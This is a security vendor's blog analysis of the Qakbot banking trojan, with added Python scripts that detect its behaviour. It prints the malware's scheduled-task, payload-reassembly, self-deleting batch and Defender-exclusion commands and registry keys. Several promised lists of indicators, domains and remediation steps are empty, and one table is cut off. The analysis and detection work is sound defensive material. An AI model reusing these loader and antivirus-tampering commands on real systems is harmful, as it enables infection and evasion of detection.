We have recently been reacquainted with an old “thorn” in the form of an increase in the number of cases involving Qakbot (also known as Qbot). This malware campaign has been around since early 2007 but can still be extremely dangerous, even given its age. With this in mind, we’re sharing some information so that you can protect yourself from this attack.
Qakbot is essentially a “banking trojan” whose main goal is to harvest information relating to online bank accounts and other related personal information. It is known to target users of financial services, aiming to steal their login credentials and ultimately empty bank accounts. Although it has been around for a while, a group of motivated developers keeps constantly updating and improving its functionality.
Often the malware's original infection mechanism is a file dropper already on the system, or malicious documents delivered through phishing campaigns. We have also seen it introduced through web browser activity in so-called “drive-bys”. Once infected, the victim’s machine creates a scheduled task that executes a JavaScript downloader, which in turn requests two (2) encrypted data files from one of several hijacked domains. Some of the IPs of the hijacked domains are detailed on VirusTotal. The JavaScript downloader then decrypts the two encrypted data files, stores them on disk and creates another scheduled task designed to execute a batch file, which in turn reassembles the malicious Qakbot executable from the two (2) decrypted files stored on disk.
The malware is known to spread through the network via Server Message Block (SMB), a networking facility included in Microsoft Windows systems, commonly used to share files etc. This is achieved using credentials harvested from the infected host system, although the malware does also attempt to “brute-force” logins, using a list of common passwords hardcoded in the malware.
Right, it's about to get a bit technical!
Once a system is infected, the malware campaign will create a scheduled task on the victim machine. This newly created task will attempt to execute a JavaScript downloader that makes a request to one of several hijacked (compromised) domains listed further down this article. The command line string that is used to create this task is:
C:\Windows\system32\schtasks.exe /create /tn {guid} /tr cmd.exe /C "start /MIN C:\Windows\system32\cscript.exe /E:javascript "C:\Users\<user>\ympoyf.wpl" /sc WEEKLY /D TUE,WED,THU /ST 12:00:00 /F
Table 1: Create Scheduled task: Download Qakbot
The C:\Users\<user> portion of the command is the specific user profile that has been “compromised”; the filename is randomly generated and carries a .wpl extension. This scheduled task will execute the following command:
cmd.exe /C start /MIN C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\ympoyf.wpl"
C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\ympoyf.wpl
Table 2: Command Line String: Download Qakbot
This scheduled task executes the JavaScript downloader, 'ympoyf.wpl' in the example above, which makes a request to the URI "/datacollectionservice.php3" on one of the several hijacked domains. The filename of the JavaScript downloader takes the form of a randomized six (6) character name with the Windows Media Player Playlist (WPL) extension.
The Command and Control (C2) server returns two (2) files of encrypted data that are saved as <random file name>_1.zzz and <random file name>_2.zzz. The aforementioned JavaScript downloader is responsible for decoding the two (2) encrypted data files as well as creating another scheduled task designed to execute a batch file similar to the following:
@echo off
type C:\ProgramData\H1Tzw7GK_1.zzz C:\ProgramData\H1Tzw7GK_2.zzz > C:\ProgramData\H1Tzw7GK.exe
start C:\ProgramData\H1Tzw7GK.exe
schtasks.exe /Delete /TN H1Tzw7GK.exe /F
del /Q /F C:\ProgramData\H1Tzw7GK_1.zzz C:\ProgramData\H1Tzw7GK_2.zzz
DEL "%~f0"
Table 3: Contents of the batch file executed by a malicious scheduled task
This batch file is responsible for reassembling the malicious Qakbot executable from the two (2) decrypted '.zzz' files using the type command. The type command is available in various command-line interpreters (shells) such as cmd.exe and Windows PowerShell and is normally used to display the contents of specified files on the terminal; here it concatenates the two fragments into a single file. After the reassembled executable is run, the two (2) '.zzz' files and the scheduled task that were used to execute the batch file are deleted from the system, and the batch file deletes itself.
Upon execution, the malware attempts to evade detection by overwriting itself with the legitimate Windows executable calc.exe using the following command:
C:\Windows\System32\cmd.exe /c ping.exe -n 6 127.0.0.1 & type C:\WINDOWS\System32\calc.exe > C:\Users\<user>\AppData\Local\Temp\SibKJWE.exe
ping.exe -n 6 127.0.0.1
Table 4: Command Line String: Ping {Send 6 Echo requests} & overwrite malware with calc.exe
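The following Python script is an added example and is not part of the original article or of Foregenix tooling. It turns the command-line strings quoted in Tables 1 to 4 into detection rules (cscript forced into JavaScript mode against a .wpl file, two .zzz fragments joined with type into an .exe, a batch file deleting itself, and a localhost ping followed by overwriting the dropped binary with calc.exe) and runs them over a handful of constructed lines. The sample lines, the user name "alice", the task GUID and the "sysmon:<pid>" / "batch:<line>" source labels are all constructed for the example; the rule names are my own.

```python
"""Flag Qakbot-style loader command lines in process-creation logs or recovered scripts.

Added example: the rules are derived from the command lines quoted in the article.
Sample input is constructed and labelled as such below.
"""
import re
from typing import Dict, List, Tuple

# Case-insensitive regexes; Windows backslashes are matched by \\ inside the patterns.
RULES: Dict[str, re.Pattern] = {
    # cscript forced into JavaScript mode against a Windows Media Player playlist (.wpl) file
    "cscript_javascript_wpl": re.compile(
        r"cscript(\.exe)?\s+/E:javascript\s+\"?[^\"\s]+\.wpl", re.IGNORECASE),
    # two .zzz fragments concatenated into an executable with the `type` builtin
    "zzz_concat_to_exe": re.compile(
        r"\btype\s+\S+\.zzz\s+\S+\.zzz\s*>\s*\S+\.exe", re.IGNORECASE),
    # batch file deleting itself (%~f0 expands to the script's own full path)
    "batch_self_delete": re.compile(r"\bdel\s+\"%~f0\"", re.IGNORECASE),
    # localhost ping used as a sleep, then calc.exe copied over the dropped binary
    "ping_then_calc_overwrite": re.compile(
        r"ping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&\s*type\s+\S*calc\.exe\s*>\s*\S+\.exe",
        re.IGNORECASE),
}

# Constructed sample input as (source, line) pairs. "sysmon:<pid>" entries stand for process
# command lines; "batch:<n>" entries are lines of a recovered dropper batch file.
# The user name, GUID and PIDs are made up for the example.
SAMPLE_LINES: List[Tuple[str, str]] = [
    ("sysmon:4012", r'C:\Windows\system32\schtasks.exe /create /tn {00000000-0000-0000-0000-000000000000} '
                    r'/tr cmd.exe /C "start /MIN C:\Windows\system32\cscript.exe /E:javascript '
                    r'"C:\Users\alice\ympoyf.wpl" /sc WEEKLY /D TUE,WED,THU /ST 12:00:00 /F'),
    ("sysmon:4100", r'cmd.exe /C start /MIN C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\ympoyf.wpl'),
    ("batch:2", r'type C:\ProgramData\H1Tzw7GK_1.zzz C:\ProgramData\H1Tzw7GK_2.zzz > C:\ProgramData\H1Tzw7GK.exe'),
    ("batch:6", r'DEL "%~f0"'),
    ("sysmon:4310", r'C:\Windows\System32\cmd.exe /c ping.exe -n 6 127.0.0.1 & '
                    r'type C:\WINDOWS\System32\calc.exe > C:\Users\alice\AppData\Local\Temp\SibKJWE.exe'),
    # benign lines that should not fire: an ordinary VBScript run and a single ping
    ("sysmon:4400", r'C:\Windows\system32\cscript.exe //nologo C:\Scripts\inventory.vbs'),
    ("sysmon:4500", r'ping.exe -n 1 10.0.0.1'),
]


def scan_line(line: str) -> List[str]:
    """Return the names of every rule that matches a single command or script line."""
    return [name for name, pattern in RULES.items() if pattern.search(line)]


def scan_lines(lines: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Run all rules over (source, line) pairs and return (source, rule) hits in input order."""
    return [(source, rule) for source, line in lines for rule in scan_line(line)]


def correlate(hits: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group hits by source so an analyst can see which artefacts on a host fire together."""
    grouped: Dict[str, List[str]] = {}
    for source, rule in hits:
        grouped.setdefault(source, []).append(rule)
    return grouped


if __name__ == "__main__":
    for source, rules in correlate(scan_lines(SAMPLE_LINES)).items():
        print(f"{source}: {', '.join(rules)}")
```

The rules are deliberately narrow (the .wpl extension, the .zzz fragment names, the calc.exe copy) so they produce few false positives on ordinary cscript or ping activity, as the two benign sample lines show; on a live host the scheduled task actions can be enumerated with Get-ScheduledTask and its Actions property and fed through scan_lines in the same way.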
After performing multiple anti-reverse-engineering and virtual machine checks, the malware sleeps for a randomised amount of time before executing its payload. When the payload is executed, the malware creates a directory within the user’s roaming profile directory and replicates itself to this directory under a randomised name such as the following:
C:\Users\<user>\AppData\Roaming\Microsoft\Bhzwlg\feulk.exe
The malware then injects itself into the explorer.exe process and creates both a scheduled task and an entry under the following registry key for persistence:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<random>
Finally, it also modifies the following registry entries for Windows Defender to exclude its location from the scanner:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet\SpyNetReporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet\SubmitSamplesConsent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\<random>
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet\Su
Table 5: List of registry entries modified by malware
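The following Python script is an added example, not code from the original article or from Foregenix. It checks registry writes for the three persistence and Defender-tampering behaviours just described: a Defender path exclusion covering a directory inside a user profile (Table 5), a write to the SpyNetReporting or SubmitSamplesConsent values under either SpyNet key (Table 5), and a Run entry launching an executable from <profile>\AppData\Roaming\Microsoft\<random>\. The sample events are constructed in the style of Sysmon Event ID 13 (value set); the key paths mirror the article, while the value names, data values and the two benign entries are my own assumptions.

```python
"""Flag Qakbot-style persistence and Defender-tampering registry writes.

Added example, not from the article. Key paths follow Table 5 and the Run key quoted
in the article; the events, value names and data below are constructed.
"""
import re
from typing import Dict, List, Tuple

RegEvent = Dict[str, str]

# A path inside a user profile's AppData directory (matched from the start of the string).
USER_APPDATA = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\AppData\\(Roaming|Local)\\", re.IGNORECASE)
# A command pointing at <profile>\AppData\Roaming\Microsoft\<random>\<random>.exe
ROAMING_MS_EXE = re.compile(
    r"[A-Z]:\\Users\\[^\\]+\\AppData\\Roaming\\Microsoft\\[^\\\"]+\\[^\\\"]+\.exe", re.IGNORECASE)
# Value names under ...\SpyNet that control Defender cloud reporting and sample submission.
SPYNET_VALUES = {"spynetreporting", "submitsamplesconsent"}

# Constructed sample events (Sysmon Event ID 13 style). The user name comes from the
# article's Table 5; "Bhzwlg" / "feulk.exe" from its example path; everything else is made up.
SAMPLE_REG_EVENTS: List[RegEvent] = [
    {"key": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
     "value": r"C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bhzwlg", "data": "0"},
    {"key": r"HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet",
     "value": "SpyNetReporting", "data": "0"},
    {"key": r"HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet",
     "value": "SubmitSamplesConsent", "data": "0"},
    {"key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "qhzxt", "data": r"C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bhzwlg\feulk.exe"},
    # benign entries that should not fire: a vendor Run entry under AppData\Local and a
    # server-wide exclusion outside any user profile
    {"key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive",
     "data": r'"C:\Users\Nd9E1FYi\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"key": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
     "value": r"C:\Program Files\Microsoft SQL Server", "data": "0"},
]


def classify(event: RegEvent) -> List[str]:
    """Return the names of the behaviours a single registry write matches."""
    findings: List[str] = []
    key = event["key"].lower()
    value, data = event["value"], event["data"]
    # 1. Defender path exclusion whose excluded path (the value name) sits in a user profile.
    if key.endswith(r"\windows defender\exclusions\paths") and USER_APPDATA.match(value):
        findings.append("defender_exclusion_in_user_profile")
    # 2. Any write to the cloud-reporting / sample-submission values under either SpyNet key.
    if (key.endswith(r"\spynet") and value.lower() in SPYNET_VALUES
            and ("windows defender" in key or "microsoft antimalware" in key)):
        findings.append("defender_cloud_reporting_modified")
    # 3. Run entry launching an exe from <profile>\AppData\Roaming\Microsoft\<random>\.
    if key.endswith(r"\currentversion\run") and ROAMING_MS_EXE.search(data):
        findings.append("run_key_to_roaming_microsoft_dir")
    return findings


def scan_registry(events: List[RegEvent]) -> List[Tuple[int, str]]:
    """Run classify over every event; return (event index, finding) pairs in input order."""
    return [(i, finding) for i, ev in enumerate(events) for finding in classify(ev)]


if __name__ == "__main__":
    for index, finding in scan_registry(SAMPLE_REG_EVENTS):
        ev = SAMPLE_REG_EVENTS[index]
        print(f"[{finding}] {ev['key']} :: {ev['value']} = {ev['data']}")
```

Rule 2 fires on any write to those values rather than on a specific data value, because a defender cares that the setting was touched at all; on a live host the current exclusion list can be compared against the same regex via the ExclusionPath property of Get-MpPreference.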
The following sections document a number of useful IOCs that can be used to identify this specific strain of malware within an environment.
The following is a list of registry entries that are modified by the malware to exclude itself from Microsoft Windows Defender antivirus scans.
Please bear in mind that the following Domains and IP addresses may no longer be occupied by malicious actors at the time of reading. Due to the nature of the game, malicious actors are quickly rotating their hijacked domains and IP addresses so as to avoid detection and monitoring.
If your company has been infected, we recommend the following remediation steps:
There is no easy answer for this. To avoid infection, it is up to the user to be conscious of what he/she is installing on their device and to be aware of phishing campaigns. We recommend training your staff regarding phishing campaigns and other cybersecurity threats.
Qakbot has been seen in the wild for quite a while now, but this does not mean it is outdated or dying; in fact it is evolving and becoming more dangerous than ever. The initial infection, like most malware, depends on the user taking an action, either failing to recognise a phishing campaign or opening a malicious document. It is therefore worth having an internal education campaign within your organisation to highlight these threats and raise awareness around combating them.
If your organisation is currently infected, or becomes infected, follow our advice on how to remediate immediately. This can be a daunting task and can certainly disrupt your normal day-to-day activities.
We hope the information on this article has helped you understand how Qakbot operates. Following the steps above will help you identify and stop the malware from propagating in your system.
Full disclosure - we’re a cybersecurity company. And this is our very short pitch… Our Proactive Incident Response solution takes advantage of Serengeti, our in-house technology, to monitor your network and endpoints, while our Threat Intelligence Group (TIG) monitors your system and takes immediate action if suspicious activity is detected.
With our solution, you’d be able to identify Qakbot and other malware in your system, stopping and removing it. Learn more about Foregenix Proactive IR here.
This blog post was written in collaboration with our Threat Intelligence Group (TIG).